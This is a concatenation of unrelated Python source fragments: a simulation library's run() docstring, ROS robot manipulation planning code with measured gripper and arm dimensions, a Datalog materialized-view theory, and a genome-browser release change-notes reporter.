specifies fuction to call before each `TIME_STEP` is executed.
call_after_time_step : callable : default None
specifies fuction to call after each `TIME_STEP` is executed.
call_before_pass : callable : default None
specifies fuction to call before each `PASS` is executed.
call_after_pass : callable : default None
specifies fuction to call after each `PASS` is executed.
call_before_trial : callable : default None
specifies fuction to call before each `TRIAL <TimeScale.TRIAL>` is executed.
call_after_trial : callable : default None
specifies fuction to call after each `TRIAL <TimeScale.TRIAL>` is executed.
termination_processing : Condition : default None
specifies `Condition` under which execution of the run will occur.
COMMMENT:
BETTER DESCRIPTION NEEDED
COMMENT
skip_analyze_graph : bool : default False
setting to True suppresses call to _analyze_graph()
COMMMENT:
BETTER DESCRIPTION NEEDED
COMMENT
animate : dict or bool : default False
specifies use of the `show_graph <ShowGraph.show_graph>` method to generate a gif movie showing the
sequence of Components executed in a run (see `example <BasicsAndPrimer_Stroop_Example_Animation_Figure>`).
A dict can be specified containing options to pass to the `show_graph <ShowGraph.show_graph>` method;
each key must be a legal argument for the `show_graph <ShowGraph.show_graph>` method, and its value a
specification for that argument. The entries listed below can also be included in the dict to specify
parameters of the animation. If the **animate** argument is specified simply as `True`, defaults are
used for all arguments of `show_graph <ShowGraph.show_graph>` and the options below:
* *UNIT*: *EXECUTION_SET* or *COMPONENT* (default=\\ *EXECUTION_SET*\\ ) -- specifies which Components
to treat as active in each call to `show_graph <ShowGraph.show_graph>`. *COMPONENT* generates an
image for the execution of each Component. *EXECUTION_SET* generates an image for each `execution_set
<Component.execution_sets>`, showing all of the Components in that set as active.
* *DURATION*: float (default=0.75) -- specifies the duration (in seconds) of each image in the movie.
* *NUM_RUNS*: int (default=1) -- specifies the number of runs to animate; by default, this is 1.
If the number specified is less than the total number of runs executed, only the number specified
are animated; if it is greater than the number of runs being executed, only the number being run are
animated.
* *NUM_TRIALS*: int (default=1) -- specifies the number of trials to animate; by default, this is 1.
If the number specified is less than the total number of trials being run, only the number specified
are animated; if it is greater than the number of trials being run, only the number being run are
animated.
* *MOVIE_DIR*: str (default=project root dir) -- specifies the directdory to be used for the movie file;
by default a subdirectory of <root_dir>/show_graph_OUTPUT/GIFS is created using the `name
<Composition.name>` of the `Composition`, and the gif files are stored there.
* *MOVIE_NAME*: str (default=\\ `name <Composition.name>` + 'movie') -- specifies the name to be used
for the movie file; it is automatically appended with '.gif'.
* *SAVE_IMAGES*: bool (default=\\ `False`\\ ) -- specifies whether to save each of the images used to
construct the animation in separate gif files, in addition to the file containing the animation.
* *SHOW*: bool (default=\\ `False`\\ ) -- specifies whether to show the animation after it is
constructed, using the OS's default viewer.
log : bool, LogCondition : default False
Sets the `log_condition <Parameter.log_condition>` for every primary `node <Composition.nodes>` and
`projection <Composition.projections>` in the Composition, if it is not already set.
.. note::
as when setting the `log_condition <Parameter.log_condition>` directly, a value of `True` will
correspond to the `EXECUTION` `LogCondition <LogCondition.EXECUTION>`.
scheduler : Scheduler : default None
the scheduler object that owns the conditions that will instruct the execution of the Composition.
If not specified, the Composition will use its automatically generated scheduler.
bin_execute : bool or enum.Enum[LLVM|LLVMexec|LLVMRun|Python|PTXExec|PTXRun] : default Python
specifies whether to run using the Python interpreter or a `compiled mode <Composition_Compilation>`.
False is the same as ``Python``; True tries LLVM compilation modes, in order of power, progressively
reverting to less powerful modes (in the order of the options listed), and to Python if no compilation
mode succeeds (see `Composition_Compilation` for explanation of modes). PTX modes are used for
CUDA compilation.
context : `execution_id <Context.execution_id>` : default `default_execution_id`
context in which the `Composition` will be executed; set to self.default_execution_id ifunspecified.
base_context : `execution_id <Context.execution_id>` : Context(execution_id=None)
the context corresponding to the execution context from which this execution will be initialized,
if values currently do not exist for **context**
COMMENT:
REPLACE WITH EVC/OCM EXAMPLE
Examples
--------
This figure shows an animation of the Composition in the XXX example script, with
the `show_graph <ShowGraph.show_graph>` **show_learning** argument specified as *ALL*:
.. _Composition_XXX_movie:
.. figure:: _static/XXX_movie.gif
:alt: Animation of Composition in XXX example script
:scale: 50 %
This figure shows an animation of the Composition in the XXX example script, with the `show_graph
<ShowGraph.show_graph>` **show_control** argument specified as *ALL* and *UNIT* specified as *EXECUTION_SET*:
.. _Composition_XXX_movie:
.. figure:: _static/XXX_movie.gif
:alt: Animation of Composition in XXX example script
:scale: 150 %
COMMENT
Returns
---------
2d list of values of OUTPUT Nodes at end of last trial : list[list]
each item in the list is the `output_values <Mechanism_Base.output_values>` for an `OUTPUT` `Node
<Composition_Nodes>` of the Composition, listed in the order listed in `get_nodes_by_role
<Composition.get_nodes_by_role>`\(`NodeRole.OUTPUT <OUTPUT>`).
.. note::
The `results <Composition.results>` attribute of the Compositon contains a list of the outputs for all
trials.
"""
context.source | |
np.array([p0[0], p0[1], 0.0, 1.0])
p0 = np.matmul(image_to_points_mat, p0)[:2]
p1 = np.array([p1[0], p1[1], 0.0, 1.0])
p1 = np.matmul(image_to_points_mat, p1)[:2]
normal = np.array([normal[0], normal[1], 0.0, 0.0])
normal = np.matmul(image_to_points_mat, normal)[:2]
return p0, p1, normal
def update(self, point_cloud_msg, tf2_buffer):
self.max_height_im.clear()
cloud_time = point_cloud_msg.header.stamp
cloud_frame = point_cloud_msg.header.frame_id
point_cloud = rn.numpify(point_cloud_msg)
only_xyz = False
if only_xyz:
xyz = rn.point_cloud2.get_xyz_points(point_cloud)
self.max_height_im.from_points_with_tf2(xyz, cloud_frame, tf2_buffer)
else:
rgb_points = rn.point_cloud2.split_rgb_field(point_cloud)
self.max_height_im.from_rgb_points_with_tf2(rgb_points, cloud_frame, tf2_buffer)
obstacle_im = self.max_height_im.image == 0
self.updated = True
def save_scan(self, filename):
# Save the new scan to disk.
self.max_height_im.save(filename)
def publish_visualizations(self, voi_marker_pub, point_cloud_pub):
marker = self.voi.get_ros_marker(duration=1000.0)
voi_marker_pub.publish(marker)
point_cloud = self.max_height_im.to_point_cloud()
point_cloud_pub.publish(point_cloud)
class PlanarRobotModel:
def __init__(self):
##################################################################
# PLANAR MODEL OF THE ROBOT
# NOTE: see navigation_planning.py for related
# values. Eventually, these should be unified into a yaml
# file, potentially with some values determined by the
# calibrated URDF.
# The heights should be measured when the arm is fully extended
# and raised. Ideally, there would also be a payload model that
# considers deflection due to a payload.
# -----
# GRIPPER AND ARM
#
# This is a model of the gripper and arm extending. It is for when
# the gripper is rotated so that it is almost straight out. The
# gripper should be rotated a little toward the back of the robot,
# so that the gripper fingers are within the width of the wrist
# while the arm is being extended. This should also bring the
# farthest point of the gripper close to the center of the wrist
# width, which enables it to fit better within a circular
# collision model. In general, this gripper pose should reduce the
# swept volume while the arm extends.
# 0.15 : distance from the side of the most proximal moving cuff to the
# side of the gripper when closed and extended straight out
# 0.14 : distance from the side of the wrist yaw cylinder to the
# side of the most proximal moving cuff
self.gripper_and_arm_width_m = 0.14 # USED FOR PLANNING: 14cm reasonable for Guthrie 1
self.diameter_of_yaw_cylinder_m = 0.045
#self.radius_of_yaw_cylinder_m = 0.0225 # USED FOR PLANNING
self.radius_of_yaw_cylinder_m = 0.022 # USED FOR PLANNING: 2.2cm using calibers for Guthrie 1
# safety margins for the arm extension
self.gripper_and_arm_width_safety_margin_m = 0.01 # USED FOR PLANNING
# distance forward from the center of the wrist yaw cylinder to
# the center of the fingertips
self.yaw_to_fingertips_m = 0.22 # USED FOR PLANNING: 22cm for Guthrie 1
# -----
# GRIPPER
#
# planar length from the center of the wrist's yaw axis to the
# gripper's fingers when about halfway closed
self.gripper_length_m = 0.26
# maximum width of the gripper fingers at the wrist, which is
# twice the distance from the edge of the servo holder to the
# center of the yaw axis cylinder (note that this width is with
# respect to the yaw axis cylinder and hence doesn't represent the
# assymetry due to the servo being on one side of the gripper
# thereby increasing the width substantially)
self.max_gripper_width_at_wrist_m = 0.1
# maximum gripper width along the fingers when it is closed so the
# fingertips are just touching each other, the measurement is made
# where the metal bows out
self.max_gripper_width_at_fingers_m = 0.075
# distance from the ground to the bottom of the most proximal part
# of the gripper at the wrist yaw joint (i.e., where the actuator
# is) when the arm is raised and extended without a payload
self.max_gripper_height_at_wrist_m = 1.015 #1.03 when
# retracted distance from the ground to the bottom of the
# gripper's fingertips when the arm is fully raised and fully
# extended without a payload
#self.max_gripper_height_at_fingers_m = 0.9 # USED FOR PLANNING
self.max_gripper_height_at_fingers_m = 1.09 # USED FOR PLANNING: 1.09 with tape measure for Guthrie 1 (safety margin for other robots? what if the arm or mast are tilted?
# distance from the ground to the bottom of the gripper's
# fingertips when the arm is lowered and extended without a
# payload
self.min_gripper_height_at_fingers_m = 0.0
# -----
# ARM
#
# distance from the outer edge of the yaw axis cylinder to the
# edge of the most proximal moving arm cuff
self.max_arm_width_m = 0.14
# distance from the ground to the bottom of the yaw axis cylinder
self.max_arm_height_m = 1.08
# measured from the exterior of the most proximal cuff to the
# interior of the wrist cuff when fully extended
# Ella: actually measured 0.51, but want to be conservative
self.max_arm_travel_m = 0.5 # USED FOR PLANNING: about 51.25cm with Guthrie 1 (so using 0.5 for safety)
# the height of the arm above the ground when the lift is at 0.0
# -----
# MOBILE BASE
#
# distance from the center of the laser range finder to the outer
# edge of the wrist when retracted
self.min_mobile_base_radius_m = 0.21
# distance from the center of the laser range finder to the back
# of the robot (does not include cables for tethering)
self.max_mobile_base_radius_m = 0.27
# radius of the circumscribing circle of the mobile base,
# currently defined by the distance to the right corner and the
# back center of the robot (does not include cables for tethering)
self.mobile_base_circumscribed_radius_m = 0.21
# mobile base origin with respect to the yaw axis of the fully
# retracted arm
#self.yaw_axis_to_origin_length_m = 0.035 # USED FOR PLANNING
self.yaw_axis_to_origin_length_m = 0.025 # USED FOR PLANNING 2.5cm with hacky measurements on Guthrie 1 (ask Blaine to look on CAD model)
#self.yaw_axis_to_origin_left_m = 0.0165 # USED FOR PLANNING
self.yaw_axis_to_origin_left_m = 0.015 # USED FOR PLANNING: 15cm using tape measure with Guthrie 1
# mobile base origin with respect to the center of the circle that
# circumscribes the mobile base
self.circumscribed_to_origin_m = 0.072
##################################################################
class ManipulationPlanner:
def __init__(self):
self.planar_model = PlanarRobotModel()
# Region around the target over which collisions are ignored
self.target_safe_radius_m = 0.1 # ignore 10cm radius around the target when reaching
def base_pose(self, max_height_image, target_xyz_pix, robot_xya_pix, image_display_on=False):
robot_xy_pix = np.int64(np.round(robot_xya_pix[:2]))
robot_ang_rad = robot_xya_pix[2]
robot_x_pix, robot_y_pix = robot_xy_pix
target_x, target_y, target_z = target_xyz_pix
image = max_height_image.image
m_per_height_unit = max_height_image.m_per_height_unit
m_per_pix = max_height_image.m_per_pix
pix_per_m = 1.0 / m_per_pix
# The maximum height of the bottoms of the fingers at full
# extension. This should represent the worst case for the fingers
# moving above objects without collisions.
max_finger_height_m = self.planar_model.max_gripper_height_at_fingers_m
max_finger_height_pix = max_finger_height_m / m_per_height_unit
target_z_m = target_z * m_per_height_unit
if target_z_m > self.planar_model.max_gripper_height_at_fingers_m:
print('Target is too high for the fingertips to reach, so planning to reach as high as possible.')
target_z_m = self.planar_model.max_gripper_height_at_fingers_m
target_z_pix = target_z_m / m_per_height_unit
# Anything taller than the target height will be considered an
# obstacle. If this fails to find a solution, then a plan that
# moves slightly above the target and then descends at the end
# could be tried.
finger_obstacle_image = np.zeros_like(image)
finger_obstacle_image[image > target_z_pix] = 255
# Remove obstacles over a small area surrounding the target. For
# example, the target might be a switch on a wall or a tall can
# with which contact is allowed. The target location may not be
# outside the perceived extent of the target object.
target_safe_radius_pix = int(round(pix_per_m * self.target_safe_radius_m))
cv2.circle(finger_obstacle_image, (target_x, target_y), target_safe_radius_pix, 0, -1)
h, w = image.shape
# Estimate where the robot can navigate given its current pose
# and and the map.
distance_map, traversable_mask = sm.process_max_height_image(max_height_image, robot_x_pix, robot_y_pix, robot_ang_rad, display_on = False)
# Dilate finger obstacles to account for the gripper and arm
# widths. This should also reduce issues due to undersampling by
# the radial search.
reach_width_m = self.planar_model.gripper_and_arm_width_m + (2.0 * self.planar_model.gripper_and_arm_width_safety_margin_m)
reach_width_pix = pix_per_m * | |
None
delta_abbr = None
if name is not None:
db_name = name + "Database"
delta_name = name + "Delta"
if abbr is not None:
db_abbr = abbr + "DB"
delta_abbr = abbr + "Dlta"
self.database = Database(name=db_name, abbr=db_abbr)
# rules that dictate how database changes in response to events
self.delta_rules = DeltaRuleTheory(name=delta_name, abbr=delta_abbr)
def set_tracer(self, tracer):
self.tracer = tracer
self.database.tracer = tracer
self.delta_rules.tracer = tracer
############### External Interface ###############
# SELECT is handled by TopDownTheory
def insert(self, formula):
return self.update([Event(formula=formula, insert=True)])
def delete(self, formula):
return self.update([Event(formula=formula, insert=False)])
def update(self, events):
"""Apply inserts/deletes described by EVENTS and return changes.
Does not check if EVENTS would cause errors.
"""
for event in events:
assert compile.is_datalog(event.formula), \
"Non-formula not allowed: {}".format(str(event.formula))
self.enqueue_with_included(event)
changes = self.process_queue()
return changes
def update_would_cause_errors(self, events):
"""Return a list of compile.CongressException if we were
to apply the events EVENTS to the current policy.
"""
self.log(None, "update_would_cause_errors " + iterstr(events))
errors = []
current = set(self.policy()) # copy so can modify and discard
# compute new rule set
for event in events:
assert compile.is_datalog(event.formula), \
"update_would_cause_errors operates only on objects"
self.log(None, "Updating {}".format(event.formula))
if event.formula.is_atom():
errors.extend(compile.fact_errors(event.formula))
else:
errors.extend(compile.rule_errors(event.formula))
if event.insert:
current.add(event.formula)
elif event.formula in current:
current.remove(event.formula)
# check for stratified
if not compile.is_stratified(current):
errors.append(compile.CongressException(
"Rules are not stratified"))
return errors
def explain(self, query, tablenames, find_all):
"""Returns None if QUERY is False in theory. Otherwise returns
a list of proofs that QUERY is true.
"""
assert compile.is_atom(query), "Explain requires an atom"
# ignoring TABLENAMES and FIND_ALL
# except that we return the proper type.
proof = self.explain_aux(query, 0)
if proof is None:
return None
else:
return [proof]
def policy(self):
return self.delta_rules.policy()
def get_arity_self(self, tablename):
result = self.database.get_arity_self(tablename)
if result:
return result
return self.delta_rules.get_arity_self(tablename)
############### Interface implementation ###############
def explain_aux(self, query, depth):
self.log(query.table, "Explaining {}".format(str(query)), depth)
# Bail out on negated literals. Need different
# algorithm b/c we need to introduce quantifiers.
if query.is_negated():
return Proof(query, [])
# grab first local proof, since they're all equally good
localproofs = self.database.explain(query)
if localproofs is None:
return None
if len(localproofs) == 0: # base fact
return Proof(query, [])
localproof = localproofs[0]
rule_instance = localproof.rule.plug(localproof.binding)
subproofs = []
for lit in rule_instance.body:
subproof = self.explain_aux(lit, depth + 1)
if subproof is None:
return None
subproofs.append(subproof)
return Proof(query, subproofs)
def modify(self, event):
"""Modifies contents of theory to insert/delete FORMULA.
Returns True iff the theory changed.
"""
self.log(None, "Materialized.modify")
self.enqueue_with_included(event)
changes = self.process_queue()
self.log(event.formula.tablename(),
"modify returns {}".format(iterstr(changes)))
return changes
def enqueue_with_included(self, event):
"""Insertion/deletion of FORMULA can require communication
with included theories. Also, rules are a bit different
in that they generate additional events that we want
to process either before the rule is deleted or after
it is inserted. PROCESS_QUEUE is similar but assumes
that only the data will cause propagations and ignores
included theories.
"""
# Note: all included theories must define MODIFY
if event.insert:
text = "Insert"
else:
text = "Delete"
formula = event.formula
if formula.is_atom():
self.log(formula.tablename(),
"compute/enq: atom {}".format(str(formula)))
assert not self.is_view(formula.table), \
"Cannot directly modify tables computed from other tables"
self.log(formula.table, "{}: {}".format(text, str(formula)))
for theory in self.includes:
changes = theory.modify(event)
self.log(formula.table, "Includee {} returned {} ".format(
theory.abbr, iterstr(changes)))
# an atomic change can only produce atomic changes
for change in changes:
self.enqueue(change)
return []
else:
# rules do not need to talk to included theories because they
# only generate events for views
# need to eliminate self-joins here so that we fill all
# the tables introduced by self-join elimination.
for rule in DeltaRuleTheory.eliminate_self_joins([formula]):
DeltaRuleTheory.reorder(rule)
bindings = self.top_down_evaluation(
rule.variables(), rule.body)
self.log(rule.tablename(),
"new bindings after top-down: " + iterstr(bindings))
new_event = Event(formula=rule, insert=event.insert,
target=event.target)
if event.insert:
# insert rule and then process data so that
# we know that data is for a view
self.enqueue(new_event)
self.process_new_bindings(bindings, rule.head,
event.insert, rule)
else:
# process data and then delete the rule so
# that we know that data is for a view
self.process_new_bindings(bindings, rule.head,
event.insert, rule)
self.enqueue(new_event)
return []
def enqueue(self, event):
self.log(event.tablename(), "Enqueueing: {}".format(str(event)))
self.queue.enqueue(event)
def process_queue(self):
"""Data and rule propagation routine.
Returns list of events that were not noops
"""
self.log(None, "Processing queue")
history = []
while len(self.queue) > 0:
event = self.queue.dequeue()
self.log(event.tablename(), "Dequeued " + str(event))
if compile.is_regular_rule(event.formula):
history.extend(self.delta_rules.modify(event))
else:
self.propagate(event)
# if self.is_view(event.formula.table):
history.extend(self.database.modify(event))
self.log(event.tablename(), "History: " + iterstr(history))
return history
def propagate(self, event):
"""Computes events generated by EVENT and the DELTA_RULES,
and enqueues them.
"""
self.log(event.formula.table,
"Processing event: {}".format(str(event)))
applicable_rules = self.delta_rules.rules_with_trigger(
event.formula.table)
if len(applicable_rules) == 0:
self.log(event.formula.table, "No applicable delta rule")
for delta_rule in applicable_rules:
self.propagate_rule(event, delta_rule)
def propagate_rule(self, event, delta_rule):
"""Compute and enqueue new events generated by EVENT and DELTA_RULE.
"""
self.log(event.formula.table,
"Processing event {} with rule {}".format(
str(event), str(delta_rule)))
# compute tuples generated by event (either for insert or delete)
# print "event: {}, event.tuple: {},
# event.tuple.rawtuple(): {}".format(
# str(event), str(event.tuple), str(event.tuple.raw_tuple()))
# binding_list is dictionary
# Save binding for delta_rule.trigger; throw away binding for event
# since event is ground.
binding = self.new_bi_unifier()
assert compile.is_literal(delta_rule.trigger)
assert compile.is_literal(event.formula)
undo = self.bi_unify(delta_rule.trigger, binding,
event.formula, self.new_bi_unifier())
if undo is None:
return
self.log(event.formula.table,
"binding list for event and delta-rule trigger: {}".format(
str(binding)))
bindings = self.top_down_evaluation(
delta_rule.variables(), delta_rule.body, binding)
self.log(event.formula.table, "new bindings after top-down: {}".format(
",".join([str(x) for x in bindings])))
if delta_rule.trigger.is_negated():
insert_delete = not event.insert
else:
insert_delete = event.insert
self.process_new_bindings(bindings, delta_rule.head,
insert_delete, delta_rule.original)
def process_new_bindings(self, bindings, atom, insert, original_rule):
"""For each of BINDINGS, apply to ATOM, and enqueue it as an insert if
INSERT is True and as a delete otherwise.
"""
# for each binding, compute generated tuple and group bindings
# by the tuple they generated
new_atoms = {}
for binding in bindings:
new_atom = atom.plug(binding)
if new_atom not in new_atoms:
new_atoms[new_atom] = []
new_atoms[new_atom].append(Database.Proof(
binding, original_rule))
self.log(atom.table, "new tuples generated: " + iterstr(new_atoms))
# enqueue each distinct generated tuple, recording appropriate bindings
for new_atom in new_atoms:
# self.log(event.table,
# "new_tuple {}: {}".format(str(new_tuple),
# str(new_tuples[new_tuple])))
# Only enqueue if new data.
# Putting the check here is necessary to support recursion.
self.enqueue(Event(formula=new_atom,
proofs=new_atoms[new_atom],
insert=insert))
def is_view(self, x):
"""Return True if the table X is defined by the theory."""
return self.delta_rules.is_view(x)
def is_known(self, x):
"""Return True if this theory has any rule mentioning table X."""
return self.delta_rules.is_known(x)
def base_tables(self):
"""Return the list of tables that are mentioned in the rules but
for which there are no rules with those tables in the head.
"""
return self.delta_rules.base_tables()
def top_down_th(self, context, caller):
return self.database.top_down_th(context, caller)
def content(self, tablenames=None):
return self.database.content(tablenames=tablenames)
# class MaterializedViewTheory(MaterializedRuleTheory):
# """A MaterializedRuleTheory where all tables are views
# of its included theories. """
# # Not sure this theory and MaterializedRuleTheory
# # should be related via inheritance.
# # MaterializedRuleTheory ignores included
# # theories on insert/delete. This theory relies on other theories
# # to compute its base tables. No way for recursive rules to span
# # the two theories.
# # Internally, views/base_tables are defined as usual so that we can
# # ignore events other than those for base_tables.
# # Can only 'include'
# # MaterializedViewTheory and MaterializedRuleTheory (for now).
# def insert(self, formula):
# """Insert FORMULA. Returns True iff the theory changed. """
# assert (isinstance(formula, compile.Atom) or
# isinstance(formula, compile.Rule)), \
# "Insert requires a formula"
# return self.modify(formula, is_insert=True)
# def delete(self, formula):
# """Delete FORMULA. Returns True iff the theory changed. """
# assert (isinstance(formula, compile.Atom) or
# isinstance(formula, compile.Rule)), \
# "Delete requires a formula"
# return self.modify(formula, is_insert=False)
# def modify(self, formula, is_insert=True):
# """Modifies contents of theory to insert/delete FORMULA.
# Returns list of changes to this theory and all included theories.
# """
# # send modification down to other theories and get events back
# changed_rules = set()
# events = set()
# for theory in self.includes:
# changed_rules |= theory.enqueue_events(formula,
# is_insert=is_insert)
# events |= theory.process_queue() # doesn't include noops
# # enqueue events on my base tables, process them, and return
# # the results
# base_tables = self.base_tables()
# for event in events:
# if event.formula.table in base_tables:
# self.queue.enqueue(event)
# local_events = self.process_queue()
# return changed_rules + (events | local_events)
##############################################################################
## | |
output, totalsize, "Table")
self.totalTableSize = strout
(output, totalsize, strout) = self.__printSize(int(ucscUtils.makeFileSizes(pushFiles, self.releasePath)), output, totalsize, "Files")
self.totalFilesSize = strout
(output, totalsize, strout) = self.__printSize(int(ucscUtils.makeFileSizes(pushGbdbs, self.releasePath)), output, totalsize, "Gbdbs")
self.totalGbdbsSize = strout
(output, totalsize, strout) = self.__printSize(int(ucscUtils.makeFileSizes(newSupp, self.releasePath)), output, totalsize, "Supplemental")
self.totalSupplementalSize = strout
(output, totalsize, strout) = self.__printSize(int(ucscUtils.makeFileSizes(additionalList, self.releasePath)), output, totalsize, "Other")
self.totalAdditionalSize = strout
(output, totalsize, strout) = self.__printSize(totalsize, output, 0, "Total")
self.totalEverythingSize = strout
output.append("")
return output
def __addMissingToReport(self, missing, type, path=None):
output = []
if missing:
output.append("%s that dropped between releases (%s):" % (type, len(missing)))
output.extend(ucscUtils.printIter(missing, path))
output.append("\n")
return output
def __checkAtticNotInTrackDb(self):
errors = []
atticTables = self.newMdb.filter(lambda s: s['objType'] == 'table' and 'attic' in s, lambda s: s['tableName'])
for i in atticTables:
foo = self.trackDb.filter(lambda s: s['track'] == i, lambda s: s['track'])
if foo:
errors.append("trackDb: %s is attic in metaDb, has an active trackDb entry" % i)
return errors
def printReport(self, args, c):
(totalFiles, newGbdbSet, newTableSet, additionalList, oldAdditionalList, oldTableSet, oldReleaseFiles, oldGbdbSet, atticSet, revokedFiles, revokedTableSet, revokedGbdbs, missingFiles, newSupplementalSet, oldSupplementalSet, pushTables, pushFiles, pushGbdbs, newSupp) = (self.totalFiles, self.newGbdbSet, self.newTableSet, self.additionalList, self.oldAdditionalList, self.oldTableSet, self.oldTotalFiles, self.oldGbdbSet, self.atticSet, self.revokedFiles, self.revokedTableSet, self.revokedGbdbs, self.missingFiles, self.newSupplementalSet, self.oldSupplementalSet, self.pushTables, self.pushFiles, self.pushGbdbs, self.newSupp)
#the groups here need to be predefined, I just copied and pasted after working out what they were
sep = "\n"
output = []
#maths
allTables = newTableSet | oldTableSet | revokedTableSet
untouchedTables = oldTableSet & newTableSet
allFiles = totalFiles | oldReleaseFiles | revokedFiles
newFiles = pushFiles - revokedFiles
untouchedFiles = (totalFiles & oldReleaseFiles) - revokedFiles
filesNoRevoke = totalFiles - revokedFiles
allGbdbs = newGbdbSet | oldGbdbSet | revokedGbdbs
untouchedGbdbs = (newGbdbSet & oldGbdbSet) - revokedGbdbs
allSupp = newSupplementalSet | oldSupplementalSet
removedSupp = oldSupplementalSet - newSupplementalSet
untouchedSupp = oldSupplementalSet & newSupplementalSet
allOther = additionalList | oldAdditionalList
removedOther = oldAdditionalList - additionalList
output.extend(self.__qaHeader(output, newTableSet, filesNoRevoke, newGbdbSet, newSupp, oldSupplementalSet, additionalList, revokedTableSet, revokedFiles, revokedGbdbs, pushFiles, pushGbdbs, args, c))
output.extend(self.__printSection(pushTables, untouchedTables, revokedTableSet, allTables, "tables", 0, args['summary']))
output.extend(self.__printSection(pushFiles, untouchedFiles, revokedFiles, allFiles, "download", self.releasePath, args['summary']))
output.extend(self.__printSection(pushGbdbs, untouchedGbdbs, revokedGbdbs, allGbdbs, "gbdbs", self.gbdbPath, args['summary']))
output.extend(self.__printSection(newSupp, untouchedSupp, removedSupp, allSupp, "supplemental", self.releasePath, args['summary']))
#These attributes are the critical ones that are used by qaInit, others could potentially use these also.
otherprint = len(allOther)
if otherprint:
output.append("\n")
output.append("OTHER FILES:")
output.append("New: %s" % len(additionalList))
output.append("Revoked/Replace: %s" % len(removedOther))
output.append("Total: %s" % len(allOther))
if otherprint and not args['summary']:
output.append("")
output.append("New Other Files (%s):" % len(additionalList))
output.extend(sorted(list(self.newOthers)))
output.append("")
output.append("Revoked Other Files (%s):" % len(removedOther))
output.extend(ucscUtils.printIter((removedOther), self.releasePath))
output.append("\n")
output.extend(self.__addMissingToReport(missingFiles, "Files", self.releasePathOld))
output.append("\n")
output.extend(self.__addMissingToReport(self.droppedTables, "Tables"))
output.append("\n")
if self.atticSet:
if self.newInAttic:
output.append("New Attic Objects (%s):" % len(self.newInAttic))
output.extend(ucscUtils.printIter((self.newInAttic)))
output.append("\n")
if self.stillInAttic:
output.append("Untouched Attic Objects (%s):" % len(self.stillInAttic))
output.extend(ucscUtils.printIter((self.stillInAttic)))
output.append("\n")
if self.noMoreAttic:
output.append("Removed from Attic Objects (%s):" % len(self.noMoreAttic))
output.extend(ucscUtils.printIter((self.noMoreAttic)))
output.append("\n")
output.append("\n")
if not args['ignore']:
output.append("No Errors")
else:
output.append("The counts here were generated by ignoring errors, they may not be correct")
return output
def __printSectionOne(self, output, set, title):
output = []
if set:
output.append("%s (%s):" % (title, len(set)))
output.extend(sorted(list(set)))
else:
return output
output.append("\n")
return output
def printReportOne(self, args, c):
(totalFiles, revokedFiles, newGbdbSet, revokedGbdbs, newTableSet, revokedTables, additionalList, atticSet, newSupplementalSet, tableSize) = (self.totalFiles, self.revokedFiles, self.newGbdbSet, self.revokedGbdbs, self.newTableSet, self.revokedTableSet, self.additionalList, self.atticSet, self.newSupplementalSet, self.tableSize)
output = []
newTables = newTableSet - revokedTables
newFiles = totalFiles - revokedFiles
newGbdbs = newGbdbSet - revokedGbdbs
output.extend(self.__qaHeader(output, newTables, newFiles, newGbdbSet, newSupplementalSet, set(), additionalList, revokedTables, revokedFiles, revokedGbdbs, totalFiles, newGbdbSet, args, c))
self.newTables = set(newTables)
self.newFiles = set(ucscUtils.printIter(newFiles, self.releasePath))
self.newGbdbs = set(ucscUtils.printIter(newGbdbs, self.gbdbPath))
self.newSupplemental = set(ucscUtils.printIter(newSupplementalSet, self.releasePath))
self.newOthers = set(ucscUtils.printIter(additionalList, self.releasePath))
if not args['summary']:
output.append("")
output.extend(self.__printSectionOne(output, self.newTables, "New Tables"))
output.extend(self.__printSectionOne(output, self.newFiles, "New Download Files"))
output.extend(self.__printSectionOne(output, self.newGbdbs, "New Gbdb Files"))
output.extend(self.__printSectionOne(output, self.newSupplemental, "New Supplemental Files"))
output.extend(self.__printSectionOne(output, self.newOthers, "New Other Files"))
output.extend(self.__printSectionOne(output, ucscUtils.printIter(revokedTables, 0), "Revoked Tables"))
output.extend(self.__printSectionOne(output, ucscUtils.printIter(revokedFiles, self.releasePath), "Revoked Files"))
output.extend(self.__printSectionOne(output, ucscUtils.printIter(revokedGbdbs, self.gbdbPath), "Revoked Gbdbs"))
if self.atticSet:
output.append("Attic Objects")
output.extend(ucscUtils.printIter((self.atticSet), self.releasePath))
if not args['ignore']:
output.append("No Errors")
else:
output.append("The counts here were generated by ignoring errors, they may not be correct")
return output
def printErrors(self, errors, missingFiles):
errorsDict = {}
output = []
lastpart = []
for i in errors:
if not re.match(".+:.+", i):
lastpart.append(i)
continue
line = i.split(":", 1)
try:
errorsDict[line[0]].append(line[1])
except:
errorsDict[line[0]] = []
errorsDict[line[0]].append(line[1])
output.append("Errors (%s):" % len(errors))
for i in sorted(errorsDict.keys()):
output.append("%s:" % i)
for j in sorted(errorsDict[i]):
output.append("%s" % j)
output.append("\n")
if missingFiles:
output.extend(self.__addMissingToReport(missingFiles, "Files", self.releasePathOld))
output.append("\n")
if self.droppedTables:
output.extend(self.__addMissingToReport(self.droppedTables, "Tables"))
if lastpart:
output.extend(lastpart)
return output
def __init__(self, args):
self.releaseNew = args['releaseNew']
self.releaseOld = args['releaseOld']
self.database = args['database']
self.composite = args['composite']
self.loose = args['loose']
self.ignore = args['ignore']
self.summary = args['summary']
self.specialMdb = args['specialMdb']
self.args = args
if 'verbose' in args:
self.verbose = args['verbose']
else:
self.verbose = 0
errors = []
c = track.CompositeTrack(self.database, self.composite, None, self.specialMdb)
#sanitize arguments
if not self.releaseOld.isdigit():
self.releaseOld = 'solo'
elif int(self.releaseOld) <= 0:
self.releaseOlf = 'solo'
elif self.releaseOld > self.releaseNew:
self.releaseOld = 'solo'
if self.verbose >= 1:
sys.stderr.write("Initializing MkChangeNotes\n")
self.releasePath = c.httpDownloadsPath + 'release' + args['releaseNew']
self.gbdbPath = "/gbdb/%s/bbi" % args['database']
self.trackDbFile = c.currentTrackDb
if not self.trackDbFile:
self.trackDb = None
errors.append("track: There is no entry in trackDb.wgEncode.ra for %s with the alpha tag" % self.composite)
else:
self.trackDb = RaFile(self.trackDbFile, "track")
if int(self.releaseNew) > 1 and str(self.releaseOld) != 'solo':
if self.verbose >= 2:
sys.stderr.write("Comparison mode\n")
self.newReleaseFiles = c.releases[int(self.releaseNew)-1]
self.oldReleaseFiles = c.releases[int(self.releaseOld)-1]
self.releasePathOld = c.httpDownloadsPath + 'release' + args['releaseOld']
self.newMdb = c.alphaMetaDb
self.oldMdb = c.publicMetaDb
if self.verbose >= 2:
sys.stderr.write("Checking for missing files\n")
#make a list of missing files
self.missingFiles = self.__checkFilesForDropped()
#filter them out of old release files
if self.verbose >= 1:
